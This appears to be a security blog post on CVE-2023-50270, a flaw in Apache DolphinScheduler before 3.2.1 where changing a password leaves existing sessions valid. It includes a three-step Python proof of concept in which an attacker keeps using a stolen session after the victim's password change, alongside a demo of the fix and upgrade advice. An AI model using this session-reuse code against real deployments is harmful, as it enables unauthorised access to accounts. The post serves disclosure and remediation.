Apache DolphinScheduler is a popular big data workflow orchestrator, used by many organizations to automate complex data pipelines. A critical security vulnerability, tracked as CVE-2023-50270, affects versions before 3.2.1. In this post, I'll explain what the issue is, show in simple terms how it can be exploited, give sample code, and share official references to help you secure your systems.
What Is CVE-2023-50270?
Session fixation is a class of vulnerability in which an attacker can force a user to use a specific session ID. If the application keeps that session alive after a critical action, such as a password change, an attacker who holds the session keeps access even after the user believes the account has been secured.
In Apache DolphinScheduler (before v3.2.1), changing a password does not invalidate the user's existing authentication sessions. An attacker who has already obtained a user's session can therefore keep using it, even after the user changes their password believing they are safe.
Example Exploit Flow
Let’s see a simple flow of how this vulnerability works by example.
Assume the attacker controls a browser or script (e.g., via JavaScript in a phishing scenario).
Step 1: Attacker Seeds a Session
```python
import requests

# Attacker sets up a session and logs in as the victim (via phishing or stolen credentials)
session = requests.Session()
login_url = "http://dolphinscheduler-server/api/login"
data = {
    "username": "victimUsername",
    "password": "victimPassword",
}
response = session.post(login_url, json=data)
response.raise_for_status()

# The attacker now holds a valid session cookie
print(session.cookies.get_dict())
# Let's say the session ID is: JSESSIONID=ABC123
```
Step 2: Victim Changes Password
Suppose the victim logs in and changes their password, but the session (ABC123) is not invalidated.
```python
# The victim logs in from their own browser (a separate session) and changes the password
victim_session = requests.Session()
victim_session.post(login_url, json=data)

change_pwd_url = "http://dolphinscheduler-server/api/user/change-password"
change_data = {
    "oldPassword": "victimPassword",
    "newPassword": "newStrongerPassword",
}
response = victim_session.post(change_pwd_url, json=change_data)
print(response.json())
# Success, password changed!
```
Step 3: Attacker Still Has Control
After the password change, the attacker's original session (ABC123) is still valid!
```python
# Attacker reuses the seeded session (ABC123) to read sensitive data
profile_url = "http://dolphinscheduler-server/api/user/profile"
profile_response = session.get(profile_url)
print(profile_response.status_code)
print(profile_response.json())
# Still returns the victim's private info, even after the password change!
```
> Upgrade ASAP to v3.2.1 or later!
In version 3.2.1, all active sessions are invalidated on password change, forcing re-authentication and closing the attacker’s window.
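As an added example (not DolphinScheduler's own code), here is a toy in-memory session store that replays the three steps above against both behaviours: the pre-3.2.1 one, where the seeded session survives, and the fixed one, where a password change drops every session the user holds. All names and credentials are constructed for the demo.

```python
import hashlib
import hmac
import secrets

class SessionStore:
    """Toy in-memory user/session store (constructed for this example).
    revoke_on_password_change=False reproduces the flaw described above;
    True behaves like the 3.2.1 fix and drops all of the user's sessions."""

    def __init__(self, users, revoke_on_password_change: bool) -> None:
        self.revoke_on_password_change = revoke_on_password_change
        self.password_hashes = {u: self._hash(p) for u, p in users.items()}
        self.sessions = {}  # session id -> username

    @staticmethod
    def _hash(password: str) -> str:
        # sha256 keeps the demo short; a real store uses a slow KDF (bcrypt/argon2)
        return hashlib.sha256(password.encode()).hexdigest()

    def _check(self, username: str, password: str) -> bool:
        stored = self.password_hashes.get(username, "")
        return hmac.compare_digest(stored, self._hash(password))

    def login(self, username: str, password: str):
        if not self._check(username, password):
            return None
        sid = secrets.token_hex(16)  # fresh, unguessable session id
        self.sessions[sid] = username
        return sid

    def is_valid(self, sid: str) -> bool:
        return sid in self.sessions

    def change_password(self, sid: str, old_pw: str, new_pw: str) -> bool:
        username = self.sessions.get(sid)
        if username is None or not self._check(username, old_pw):
            return False
        self.password_hashes[username] = self._hash(new_pw)
        if self.revoke_on_password_change:
            # Fixed behaviour: every session owned by this user is dropped, so a
            # session an attacker obtained earlier stops working immediately.
            self.sessions = {s: u for s, u in self.sessions.items() if u != username}
        return True


def stale_session_survives(revoke_on_password_change: bool) -> bool:
    """Replay the three steps above; True means the old session still works."""
    store = SessionStore({"victim": "victimPassword"}, revoke_on_password_change)
    attacker_sid = store.login("victim", "victimPassword")  # step 1: seeded session
    victim_sid = store.login("victim", "victimPassword")    # step 2: victim's own login
    assert store.change_password(victim_sid, "victimPassword", "newStrongerPassword")
    return store.is_valid(attacker_sid)                     # step 3: still valid?
```

`stale_session_survives(False)` returns True (the flaw), `stale_session_survives(True)` returns False (the fix); the same two-session check is what to run against a real instance after upgrading.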
Links
- CVE Details for CVE-2023-50270
- Apache DolphinScheduler Release Notes
- Official Issue Tracker / Patch Commit
Upgrade DolphinScheduler now
```shell
# Example: use your usual method to upgrade, e.g. via Docker or the release archive
docker pull apache/dolphinscheduler:3.2.1
# or download the updated ZIP/TAR from the official releases page
```
Until you can upgrade, invalidate (sign out) a user's active sessions whenever their password changes.
Conclusion
Session fixation is an old but dangerous bug, especially in systems that manage sensitive workflows like DolphinScheduler. Don’t wait — upgrade today. Share this post with your team and stay safe!
*Feel free to reach out or comment below if you need help checking your system or upgrading.*
Timeline
Published on: 02/20/2024 10:15:08 UTC
Last modified on: 08/29/2024 20:35:41 UTC